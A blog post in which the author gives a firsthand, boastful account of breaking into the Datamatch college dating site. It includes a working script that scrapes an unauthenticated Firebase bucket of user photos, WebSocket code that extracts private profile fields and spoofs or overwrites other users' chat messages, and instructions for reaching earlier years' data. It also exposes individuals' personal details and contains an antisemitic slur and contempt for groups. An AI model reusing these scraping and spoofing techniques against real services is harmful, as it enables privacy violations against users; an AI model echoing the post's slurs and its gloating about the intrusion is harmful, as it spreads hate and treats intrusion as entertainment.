fumo.club

Hacking Datamatch: A Retrospective

The Harvard Crimson newspaper wrote an article about this hack [archived] in March 2024, shortly after it happened. What you’re about to read is my firsthand account, six months after its publication, along with some never-before-seen evidence.

Datamatch is a dating website for college students at a handful of campuses around the country, with tens of thousands of users. It opens up around Valentine’s Day every year and is meant to be more of a cute icebreaker than anything. There are no nefarious algorithms or profit motives at work here, just a quirky questionnaire and your standard profile fields like your name, gender, and… Rice Purity Test score?

JSON data of a user’s profile

For context, the Rice Purity Test is an online quiz where you check off various immoral, illicit, or sexual things you’ve done. Your score starts at 100 and drops by 1 for every box you check, so a lower score means you’ve done more degenerate shit.

Plenty of Datamatch users filled out their profiles, and volunteered their Rice Purity Test scores, trusting that the site would keep their data safe. *LOUD BUZZER* WRONG!

A Crime of Opportunity

The following recollection is almost entirely from memory, so forgive me if details are scant. The chat where we orchestrated this got nuked, but I held on to some things.

We came across Datamatch’s vulnerabilities entirely by chance. Basically, someone figured out that you could view profile pictures from their Firebase store without authentication. The site only allows sign-ups from people with email addresses at one of the whitelisted universities, so this was the first sign that something was amiss. Here’s a random URL I picked:

https://firebasestorage.googleapis.com/v0/b/datamatch2024.appspot.com/o/profile_pics%2F4d9dBuit4bYlsLYs7JKEMMTqpjV2%2Fimage1.jpg?alt=media&token=707a29d7-e0ef-46cc-9a1b-d9afd462fb69

Obviously, it’s gone now. Here’s the actual picture, so you know I’m not making this up :)

image1.jpg

The token doesn’t seem to be tied to an account or a login, since it didn’t meaningfully restrict access to the images: anyone holding the full URL could load the picture. But profile pictures on their own aren’t really sensitive information, and the URLs were randomized, so this still wasn’t the worst thing in the world.

Note that the involvement of the person who originally unearthed this ends here. From this point on, me and a couple others who saw his message went into a private chat and decided to see how far we could take it. We were students at one of the whitelisted universities, so we signed up as ordinary users with bare-bones profiles and started poking around.

Well, you don’t even need an account to figure this first one out. Using the Firebase JavaScript library, I was able to write up a simple script to list all objects in the datamatch2024 bucket, then download them.

import path from 'node:path';
import https from 'node:https';
import fs from 'node:fs';
import { fileURLToPath } from 'node:url';

import { initializeApp } from 'firebase/app';
import { getDownloadURL, getStorage, ref, list } from "firebase/storage";

const firebaseConfig = {
    projectId: "datamatch2024",
    storageBucket: "datamatch2024.appspot.com",
    appId: "datamatch2024",
};

// Resolves true for a newly downloaded file, false if it already exists on disk.
function download(url, dest) {
    return new Promise((resolve, reject) => {
        if (fs.existsSync(dest)) {
            resolve(false);
            return;
        }
        const file = fs.createWriteStream(dest);
        https.get(url, function(response) {
            response.pipe(file);
            file.on('finish', function() {
                file.close(() => resolve(true));
            });
        }).on('error', function(err) { // Handle errors
            fs.unlinkSync(dest);
            reject(err.message);
        });
    });
}

const app = initializeApp(firebaseConfig);
const defaultStorage = getStorage(app);
const __filename = fileURLToPath(import.meta.url);
const __dirname = path.dirname(__filename);
const dataDir = path.resolve(__dirname, "data24");

async function downloadFiles(refs) {
    const deepestRef = refs[refs.length - 1];
    const filepath = path.join(dataDir, ...refs.map(r => r.name));
    // No error if the directory is already there
    fs.mkdirSync(filepath, { recursive: true });

    let pageNum = 0;
    let pageToken = undefined;
    do {
        console.log("Page " + (++pageNum));
        let results = await list(deepestRef, {
            maxResults: 1000,
            pageToken,
        });
        pageToken = results.nextPageToken;

        for (const i of results.items) {
            const url = await getDownloadURL(i);
            // only print if new file
            if (await download(url, path.join(filepath, i.name))) {
                console.log("Downloaded " + i.fullPath);
            }
        }

        // recurse down the file tree
        for (const p of results.prefixes) {
            console.log("Found prefix " + p.name);
            await downloadFiles([...refs, p]);
        }
    } while (pageToken);
}

(async () => {
    const listRef = ref(defaultStorage, "/");
    await downloadFiles([listRef]);
})();

I now had everyone’s pictures (16,724 accounts, to be exact). But wait, there’s more; I found some fun internal documents too. I reformatted these slightly for clarity.

stats/word_freq.json (abridged)

{
    "All": [
        {
            "word": "food",
            "occurrences": 378
        },
        {
            "word": "person",
            "occurrences": 147
        },
        {
            "word": "student",
            "occurrences": 378
        },
        {
            "word": "fan",
            "occurrences": 178
        },
        ...
    ]
}

stats/love_language_gender.json

{
    "woman": {
        "Quality Time": 0.466,
        "Physical Touch": 0.186,
        "Words of Affirmation": 0.148,
        "Acts of Service": 0.16,
        "Gifts": 0.04
    },
    "man": {
        "Words of Affirmation": 0.089,
        "Quality Time": 0.506,
        "Physical Touch": 0.306,
        "Acts of Service": 0.078,
        "Gifts": 0.021
    },
    "nonbinary": {
        "Words of Affirmation": 0.117,
        "Physical Touch": 0.249,
        "Quality Time": 0.446,
        "Acts of Service": 0.146,
        "Gifts": 0.043
    }
}

stats/rice_purity_avg.csv (abridged)

school,score,numStudents
Princeton,66,430
MIT,73,327
Harvard,60,1269
Caltech,66,79
Columbia,60,340
Harvard-MIT,50,247
Dartmouth,57,169
UPenn,68,77
UChicago,63,444
CalPoly,61,82
UC Davis,68,140
UCLA,78,50
Yale,58,71
Brown,63,330
Northeastern,67,11
UCSD,68,42
NYU,65,12
CMU,77,9
USC,65,7
UC Berkeley,33,2

The Datamatch team probably tunes their algorithm from year to year, so the fact that they compiled these stats is innocent enough, but it’s kind of interesting to see all the raw data points.

The table of Rice Purity scores, for example, confirms our biases about MIT and Carnegie Mellon being nerdy schools, but it offers some surprises too. I didn’t expect UCLA, which has an active party scene, to be that high, or the Ivy League schools and UC Socially Dead to be that low. Berkeley, with only 2 respondents, is just an anomaly.
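Since the sample sizes vary so much, a plain average of the per-school scores would give Berkeley's 2 respondents the same weight as Harvard's 1,269. Here is a rough sketch of weighting each school by numStudents and flagging tiny samples. The rows are copied from the abridged CSV above; the function names and the cutoff of 30 respondents are arbitrary choices made for illustration, not anything Datamatch uses.

```javascript
// Rows copied from the abridged stats/rice_purity_avg.csv listing.
const ricePurityCsv = `school,score,numStudents
Princeton,66,430
MIT,73,327
Harvard,60,1269
Caltech,66,79
Columbia,60,340
Harvard-MIT,50,247
Dartmouth,57,169
UPenn,68,77
UChicago,63,444
CalPoly,61,82
UC Davis,68,140
UCLA,78,50
Yale,58,71
Brown,63,330
Northeastern,67,11
UCSD,68,42
NYU,65,12
CMU,77,9
USC,65,7
UC Berkeley,33,2`;

// Parse the CSV into objects (no quoted fields here, so a plain split is enough).
function parseRicePurity(csv) {
    return csv.trim().split("\n").slice(1).map((line) => {
        const [school, score, numStudents] = line.split(",");
        return { school, score: Number(score), numStudents: Number(numStudents) };
    });
}

// Mean score where each school counts in proportion to its respondents.
function weightedMean(rows) {
    const totalStudents = rows.reduce((sum, r) => sum + r.numStudents, 0);
    const weightedSum = rows.reduce((sum, r) => sum + r.score * r.numStudents, 0);
    return weightedSum / totalStudents;
}

// Hypothetical cutoff: schools below this many respondents are treated as noise.
const MIN_STUDENTS = 30;

const ricePurityRows = parseRicePurity(ricePurityCsv);
const smallSamples = ricePurityRows
    .filter((r) => r.numStudents < MIN_STUDENTS)
    .map((r) => r.school);

console.log("Weighted mean:", weightedMean(ricePurityRows).toFixed(1));
console.log("Too few respondents to trust:", smallSamples.join(", "));
```

With that cutoff, the schools that get flagged are the ones at the bottom of the table, Berkeley included.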

Hopefully seeing some secret stuff got you excited. Ready to dig even deeper?

“The Cybersecurity Equivalent of Freeballing Jorts”

Armed with our own accounts, we cracked open our browsers’ Developer Tools and started poking around. The website has a search feature, where you can look people up by name. This didn’t really make sense to me, because finding your friends on a dating app is sure to cause embarrassment, and the whole point is to meet new people, right? In any case, it was useful in that it introduced a gaping security hole. As one member of our crew put it, “the cybersecurity equivalent of freeballing jorts”. Almost as bad as a cyber-goatse.

All you have to do is type a name in the search bar, and watch the WebSocket responses come in.

Profile JSON, mostly unredacted

Another profile’s JSON, cut off but not redacted

It’s possible to programmatically look up a profile by ID, too, once you have the WebSocket handle:

var i = 69; // just a message counter
function requestProfileWebsocket(ws, uid) {
    ws.send(JSON.stringify({
        "t": "d",
        "d": {
            "r": i++,
            "a": "q",
            "b": {
                "p": `/publicProfile/${uid}`,
                "h": ""
            }
        }
    }));
}

WebSocket requests

Yup, even the “publicProfile” endpoint sends the “private” fields. This was huge. It’s what prompted the redacted screenshot at the top of this page, which originates from an Instagram story, which culminated in the Crimson covering it. Probably the only thing that could have made this worse was revealing email addresses and plaintext passwords, but luckily for the users, we found no sign of those.
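For contrast, here is a minimal sketch of what you'd expect a "public" profile to be: a copy of the full record with everything outside an explicit allowlist stripped before it ever reaches another user. The field names below are made up for illustration and are not Datamatch's real schema, and toPublicProfile is a hypothetical helper.

```javascript
// Hypothetical allowlist; the real schema is not reproduced here.
const PUBLIC_FIELDS = ["name", "school", "year", "bio"];

// Copy only allowlisted keys, so new private fields stay private by default.
function toPublicProfile(fullProfile) {
    const publicProfile = {};
    for (const key of PUBLIC_FIELDS) {
        if (Object.prototype.hasOwnProperty.call(fullProfile, key)) {
            publicProfile[key] = fullProfile[key];
        }
    }
    return publicProfile;
}

// Example record with one made-up private field.
const exampleProfile = {
    name: "Example User",
    school: "Example University",
    year: 2026,
    ricePurity: 70, // hypothetical private field
};

console.log(toPublicProfile(exampleProfile));
```

An allowlist fails closed: a field added later is hidden unless someone deliberately exposes it. When clients read the database directly, the same idea would presumably mean writing only these fields under the public path in the first place, rather than filtering on the way out.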

At this point we’re just screwing around. The very next thing we did was look up the Rice Purity scores of the Datamatch devs and take the piss out of them.

Dev 1 has a score of 48

Dev 2 has a score of 51

Oh, and remember how I scraped the whole Firebase bucket earlier? The random strings in the URLs of the profile pictures are actually user IDs, so we have a list of most of the users now. Combine this with publicProfile and you become omniscient. Real name, real face, hobbies, music taste, social media account, school, graduation year, even the name of their dorm and their weekly schedule. You could play God with all that info.

Not every user sets their profile pics, but I think we managed to get a pretty good amount of them. Datamatch reports “22,000+ users” on their homepage, and we got over 16,000. It’s fair to assume that the rest of them either didn’t finish the questionnaire that puts them in the dating pool, or were not too serious about the whole thing, or they just didn’t want to get too personal. (I certainly don’t blame them for the last one.) In other words, the same people who don’t have a profile pic are likely the ones who don’t have information worth harvesting.

Ok, that was pretty fun, but we’re not done yet. For our next experiment, me and an accomplice deliberately matched with each other.

Wherefore Art Thou Romeo?

I was trying to see if you could leak people’s matches, but I found something else instead. Datamatch lets you send direct messages to people you match with, and it even has a few pre-written conversation openers to help you out. It’s just that the way this chat system is implemented is pretty sloppy.

By studying the WebSockets going in and out, I came up with a way to programmatically send a message.

var i = 69; // message counter
function sendConvoStarterWebsocket(ws, convo, msg, isConvoStarter=false, hash='xxxxxxxxxxxxxxxx') {
    ws.send(JSON.stringify({
        "t": "d",
        "d": {
            "r": i++,
            "a": "p",
            "b": {
                "p": `/messages/${convo}/-Nr3${hash}`,
                "d": {
                    "convoStarter": isConvoStarter,
                    "name": "user1",
                    "text": msg,
                    "timestamp": (new Date()).getTime()
                }
            }
        }
    }));
}

The convo variable here is just an identifier that represents a particular conversation between you and your match. The hash is an identifier for an individual message, which I guess the client is responsible for generating. It is always 20 characters long, including the -Nr3 prefix, so you can just make up the remaining 16 characters.

The chat client regularly polls the WebSocket server for the latest message, which has some interesting implications. If the server repeats the same message ID twice in a row, but with different contents, the last message in the conversation will just get overwritten. In other words, they unintentionally made it so you can edit messages. Me and my pentesting partner tested this out while sitting right next to each other and made sure it affected both users. It even persisted after refreshing, so it was probably overwriting the value in the database, too.

user1 refers to the current client’s user, and user2 is the other person (not sure if this is always the case). I don’t remember if we were able to successfully spoof a user2 message, but I do remember being able to overwrite a user2 message with a user1 message. This is obviously not how an edit feature should work. In fact, it’s more like a delete feature, but for the other person’s most recent message. This could make for some funny gaslighting.
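To make the overwrite behavior concrete, here is a toy in-memory model of it. This is not Datamatch's backend, just a Map standing in for a key-value message store; MessageStore, putNaive, and putOnce are names invented for this sketch.

```javascript
// Toy stand-in for a message store keyed by message ID.
class MessageStore {
    constructor() {
        this.messages = new Map();
    }

    // Naive write: whatever arrives last under an ID wins, whoever sent it.
    putNaive(id, message) {
        this.messages.set(id, message);
    }

    // Stricter write: an ID that already exists can never be written again.
    putOnce(id, message) {
        if (this.messages.has(id)) {
            return false;
        }
        this.messages.set(id, message);
        return true;
    }
}

const naiveStore = new MessageStore();
naiveStore.putNaive("msg-1", { name: "user2", text: "hey, nice to meet you" });
naiveStore.putNaive("msg-1", { name: "user1", text: "something else entirely" });
// user2's message is gone, replaced by user1's write under the same ID.
console.log(naiveStore.messages.get("msg-1"));

const strictStore = new MessageStore();
strictStore.putOnce("msg-1", { name: "user2", text: "hey, nice to meet you" });
const accepted = strictStore.putOnce("msg-1", { name: "user1", text: "something else entirely" });
console.log(accepted, strictStore.messages.get("msg-1"));
```

The naive version is roughly what we seemed to be observing: the second write silently replaces the first. A write-once check like putOnce would at least stop one user from clobbering the other's message.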

(In the latest Harvard Crimson article, a Datamatch dev downplayed this exploit by saying that it was similar to editing a text message. I’m still not sure that they get it.)

And as the other variables imply, it is totally possible to spoof the “conversation starter” decorations on a message, as well as the timestamp. Check it out:

Fake conversation starter

We started writing sexual conversation starters from 1200 AD.

CBT conversation starter from year 1200

I revised my message right after to use Olde English, but I didn’t take a screenshot, oops.

Future timestamps work as well:

Conversation starter from year 6969
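The timestamp is just a number of milliseconds since 1970 supplied by the client, so nothing stops it from being negative or absurdly large. A quick sketch of the values involved, plus the kind of sanity check a server could apply. The five-minute tolerance and the isPlausibleTimestamp helper are assumptions made up for this example.

```javascript
// Milliseconds since the Unix epoch for the two years in the screenshots.
const year1200 = Date.UTC(1200, 0, 1); // negative: long before 1970
const year6969 = Date.UTC(6969, 0, 1); // far in the future

// Hypothetical tolerance for clock drift between client and server.
const MAX_SKEW_MS = 5 * 60 * 1000;

// Accept a client timestamp only if it is close to the server's own clock.
function isPlausibleTimestamp(clientMs, serverNowMs = Date.now()) {
    return Number.isFinite(clientMs) && Math.abs(clientMs - serverNowMs) <= MAX_SKEW_MS;
}

console.log(year1200, isPlausibleTimestamp(year1200));
console.log(year6969, isPlausibleTimestamp(year6969));
console.log(isPlausibleTimestamp(Date.now()));
```

Even simpler would be to ignore the client's value and stamp the message on the server when it arrives.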

Anyway, all these findings are pretty interesting, I think, but unfortunately the story didn’t go public in the way I wanted, which is partly why I waited until now to reveal everything. Go read the initial Harvard Crimson report [archived] for context on this next part.

The Sungjooish Question

So, you might be thinking, who the hell is this Sungjoo Yoon guy that’s mentioned in the article? Is that you? No. He was one of the first Harvard people to find the Instagram story and promised to put us in contact with the devs, or at least publicize it to the Harvard student body if they tried to sweep it under the rug.

Sungjoo’s first message

In retrospect, we could have emailed Datamatch without the middleman, but I guess we wanted some clout. Or maybe it’s more accurate to say we wanted to anonymously cause some chaos, since no one wanted to own up to doing something that pissed off a good deal of people and was possibly even illegal. Having a connection at Harvard to act on our behalf seemed to be the best way to do that at the time.

So our guy who was in contact with Sungjoo had shown him how to reproduce the exploit. Then Sungjoo made a write-up [archived] and for the first week he even published an excerpt of some of the Rice Purity scores, with first and last initials only.

Sungjoo explaining how he would give us credit

Unfortunately, he also turned out to be a prick. His writings are some of the most pretentious fluff I’ve ever read, and my standards were already low – this is Ivy League youth we’re talking about. He types like a social justice warrior. “Bernie Marx” was his pen name, are you kidding me? We did this as an act of simple mischief, not hacktivism, but he sure tried to LARP like it was. I detest communists, by the way.

As if that wasn’t enough, he changed his Instagram profile picture to Jenkins from South Park, as if he was the 400 lb hacker mastermind behind all of this. It pissed me off that this insufferable little freshman hardly even acknowledged that the vulnerability wasn’t his own discovery. Anyone who knows can tell from his writings that he doesn’t have the technical knowledge required to actually understand the exploit firsthand. He’s just a political science major, but that didn’t stop him from claiming to have a penchant for coding, or whatever. I’m not gonna pretend that the vulnerabilities were hard to find, but how did anyone seriously believe for a second he was capable of discovering them?

After the first article [archived] was published in the Crimson, our liaison with Sungjoo was understandably upset that he took the credit for himself, so he called him up. When Sungjoo answered the phone, he carefully chose his words, acting like his lawyer was in the room with him, and claimed that angry parents were threatening to sue him. That actually sounded kind of plausible for a sec, until you remember that he didn’t reveal anyone’s real name, and he was still gloating about the leak to his classmates. The kid was just playing mind games to discourage us from rightfully claiming credit for ourselves.

Sungjoo whined to the journos about how he was afraid of getting bullied or whatever for being “the leaker”, but simultaneously elected to divulge his identity to get his own personal profile [archived] in the newspaper. All while he did jack shit. Maybe it would’ve been funny if he got thrown under the bus instead of getting recognized as a “campus celebrity”. I’m not a Harvard student so I can’t actually gauge what the campus reaction was, but from what I gleaned online at the time, it was part astonishment and part resentment towards Sungjoo. I wasn’t gonna be satisfied with just that.

Eventually, I knew I had to go to the Harvard Crimson myself, just to strip that bit of pride away from him, and that’s how we ended up with the follow-up article linked at the very top of this page. I also reported on the still-unknown direct messaging vulnerabilities, which weren’t such a big deal, but were definitive proof that we got there first.

I did deceive my accomplices by going to the journalists because we all agreed to keep our involvement in the hack a secret. Some of them still believed Sungjoo was serious about the legal repercussions part. I don’t even like journalists. They demanded I turn over private conversations, and made it into kind of a hit piece against us. Boo-hoo, we said some politically incorrect things while looking through people’s profiles behind closed doors. I’d do it again in a heartbeat. That’s not the worst thing the journos did, though. They asked for a second source to corroborate what I said, so I gave them the name of the guy who was in contact with Sungjoo. I wish they would have respected his anonymity, but they didn’t. Luckily for me, my colleagues never identified me as the mole. Still, I went to the Crimson in the first place because I wanted petty revenge, and I’m not especially proud of that.

The Moral of the Story

There is no moral dilemma here. Datamatch has admitted to fucking up their handling of personal data before [archived]. Just a couple years ago, they literally published GitHub repositories with all your info and left them on public, guys. It says it right there. Back in 2021, they claimed that the very same fields marked “private” that we discovered in the API are actually supposed to be public. They haven’t even updated the privacy page since 2023, so there’s no official mention of this leak. No one seems to care! It was only a matter of time until someone dug around and found something else they shouldn’t have. That’s what I’m here for. I’m no saint, I’m posting people’s personal data without permission for some shock value, but at least I’m making an effort to raise awareness. Heck, I even offered some suggestions to the Datamatch devs while being interviewed by the Crimson.

And you know what, Harvard doesn’t produce the brightest programmers – it’s a liberal arts school. In fact, the whole Ivy League is just a breeding ground for future snakes – politicians, doctors, businessmen, and the like. Full of legacy kids, diversity admits, and a disproportionate amount of J€w$. This particular website is just run by a club at their school which is naturally gonna have a high turnover rate. I can’t necessarily blame them for their incompetence; they’re bound to repeat their mistakes.

It’s also not just a Datamatch problem. This very same year, another dating site called Duolicious had all its user data leaked online. Before that, they were giving researchers full access to their data. Dating sites are pretty much honeypots by design. I can’t believe I have to say this, but all online communication is best done anonymously, or at least behind a pseudonym. Using your true identity creates a cringe TMI situation at best, and can get you cancelled/doxxed/swatted at the worst.

Is what we did illegal? I’m inclined to think otherwise, but I’m not taking any risks here, since they did lock up weev for scraping public API endpoints, much like we did.

The bigger issue here is that people willingly hand their info over to Datamatch/Duolicious/etc. time and time again in spite of all the warning signs. I think they need to take some responsibility for that, and learn some goddamn opsec. Normies in college mostly just want attention, though, and they probably don’t think twice about privacy. Look at how Sungjoo couldn’t stop attention whoring about the hack that he didn’t even pull off. He acts all preachy about raising “ethical awareness” for data privacy, and he almost has a point, but then immediately gives up any notion of ethics or privacy by outing himself as the “hacker”. I bet he wanted to put this on his resume so bad, right alongside his New York Times op-ed. Nothing ever changes about these Ivy League snakes, I swear.

So could a Datamatch incident happen again? I think that would be fucking hilarious, and I’ll certainly try to make it happen, if for no reason other than my own entertainment. And if it does happen, you’ll hear it from the source.

Fumo out.

DataCrack: Made with ❤️ in Los Angeles


Bonus Finds

I scraped all the data I could from Firebase because I knew Datamatch was going to tighten their security sooner or later, and I actually found the assets from previous years. All you have to do is swap the 2024 in datamatch2024 for 2023, 2022, or 2021. The site is supposed to start from a clean slate every year, so this was a pleasant surprise. Maybe they kept it around for internal use?

I couldn’t get the profile data, but like before, I did get everyone’s pictures and the stats compiled by the devs.

datamatch2021 - stats/profile.csv

"profile","Algo","Both","Search","total"
"Has bio and photo",0.329464988198269,0.0819564647259376,0.0660896931549961,0.477511146079203
"Only has photo",0.274126800198643,0.0509849362688297,0.0489985101804337,0.374110246647906
"Only has bio",0.259528130671506,0.0446914700544465,0.0390199637023593,0.343239564428312
"Has neither",0.178184534927157,0.0264288382517744,0.0351139335076578,0.239727306686589

The columns might represent different ways that users found each other? Looks like the search feature is pretty underutilized, as I expected. Each row’s total is just the sum of its three columns, but oddly, the four totals add up to about 1.43 rather than 1.
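A quick way to sanity-check those numbers, using the rows copied from the CSV above. The variable names are mine, and the script makes no guess about what the columns actually mean.

```javascript
// Rows copied from datamatch2021 stats/profile.csv.
const profileCsv = `"profile","Algo","Both","Search","total"
"Has bio and photo",0.329464988198269,0.0819564647259376,0.0660896931549961,0.477511146079203
"Only has photo",0.274126800198643,0.0509849362688297,0.0489985101804337,0.374110246647906
"Only has bio",0.259528130671506,0.0446914700544465,0.0390199637023593,0.343239564428312
"Has neither",0.178184534927157,0.0264288382517744,0.0351139335076578,0.239727306686589`;

// No commas inside the quoted labels, so a plain split works for this file.
const profileRows = profileCsv.trim().split("\n").slice(1).map((line) => {
    const [profile, algo, both, search, total] = line.split(",");
    return {
        profile: profile.replace(/"/g, ""),
        algo: Number(algo),
        both: Number(both),
        search: Number(search),
        total: Number(total),
    };
});

// Does each row's total equal Algo + Both + Search (within rounding error)?
for (const row of profileRows) {
    const rowSum = row.algo + row.both + row.search;
    const matches = Math.abs(rowSum - row.total) < 1e-9;
    console.log(row.profile, "row sum matches total:", matches);
}

// Do the totals themselves form a distribution that sums to 1?
const sumOfTotals = profileRows.reduce((sum, row) => sum + row.total, 0);
console.log("Sum of the total column:", sumOfTotals.toFixed(3));
```

So the total column is consistent within each row, and whatever these fractions are, the four rows are not shares of a single whole.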

datamatch2023 - stats/thirst-index.csv

School,2024,2023,2022,2021,total
Dartmouth,0.36589113257243194,0.4675153643546971,0.2776558384547849,0.26953467954345917,1.4038630377524144
Williams,0.32670744138634045,0.45565749235474007,0.2329255861365953,0.2528032619775739,1.269113149847095
BC,0.11498147167813658,0.2420328215987295,0.24182106934886183,0.18930651138168342,0.7894123875066172
UW Madison,0.2592733017377567,0.3010742496050553,0.20843601895734598,0.2154818325434439,1.0647709320695105
Claremont,1.7670364500792393,1.8811410459587956,1.6949286846275753,1.1553090332805072,6.550713153724248
WashU,0.9000676132521974,1.0947937795807978,0.8947937795807979,0.777552400270453,3.72183908045977
Vanderbilt,0.36162675357800766,0.2183647442255916,0.10542723536913702,0.05781493552501063,0.743942185064475
Caltech,0.9635258358662614,1.4488348530901722,0.790273556231003,0.4518743667679838,3.6950354609929077
Harvard,1.1635928480923554,1.5113332394762777,1.2362382092073771,1.4050401238913135,5.35942559481909
UChicago,0.8114830003968779,0.49503902632623364,0.41764783701547825,0.25955814261145654,2.008466728403228
CMU,0.11536830199349639,0.11310617842499647,0.2431782836137424,0.09416089353880956,0.6065318818040436
Brown,0.7368963486454653,0.6604829210836278,0.7370435806831567,0.5222320376914017,2.679770318021202
UIUC,0.03214792094678665,0.05396568187736914,0.0354755635290373,0.015943748372348736,0.13944269220752914
BU,0.10375075620084695,0.10429522081064731,0.07132486388384755,0.037749546279491834,0.326497277676951
Yale,1.1451543739279588,1.2352058319039452,1.077401372212693,0.698327615780446,4.18696397941681
UC Davis,0.03095345684591053,0.029016848492673164,0.06607062165128139,0.05125556774901556,0.19001355625847266
McGill,0.17403325238184195,0.14391929759013639,0.11959648795068185,0.09777694750607137,0.5544554455445544
Carleton,1.2189638318670577,0.8699902248289345,1.0210166177908113,0.6075268817204301,3.7253176930596283
MIT,0.3318240620957309,0.5351444588184562,0.48296679603277276,0.22660629581716257,1.5797757654161275
Princeton,0.5511676476172395,0.4909815834440858,0.2992215682551737,0.1965065502183406,1.5471805581925195
Bates,0.19776119402985073,0.19669509594882728,0.1257995735607676,0.45362473347547977,0.9909381663113006
NYU,0.017104377104377105,0.012087542087542088,0.008484848484848486,0.006767676767676768,0.045791245791245785
UPenn,0.23095190975658025,0.21096378389075796,0.15426479319216307,0.07599445873738374,0.700376014248961
UCLA,0.021518987341772152,0.06518987341772152,0.04158227848101266,0.02420886075949367,0.1542721518987342
Furman,0.6464818763326226,0.7974413646055437,0.9313432835820895,0.5987206823027719,2.9739872068230273
Smith,0.384006334125099,0.569279493269992,0.45288994457640536,0.27117973079968327,1.6785431512272366
USC,0.019,0.02457142857142857,0.03823809523809524,0.039285714285714285,0.12366666666666667
Wesleyan,0.1844527787248551,0.3689055574497102,0.5779065802932152,0.36549607909989773,1.501534265257416
Columbia,0.08912010857272111,0.08052476815200181,0.10642388599864284,0.11173942546935083,0.40262384076000907
UCSD,0.04286791030714151,0.047861315244017336,0.03225299918346838,0.015200050248099993,0.1450599836693675

This one just had a funny name. I’m not sure what it means. Harvard students be hella thirsty.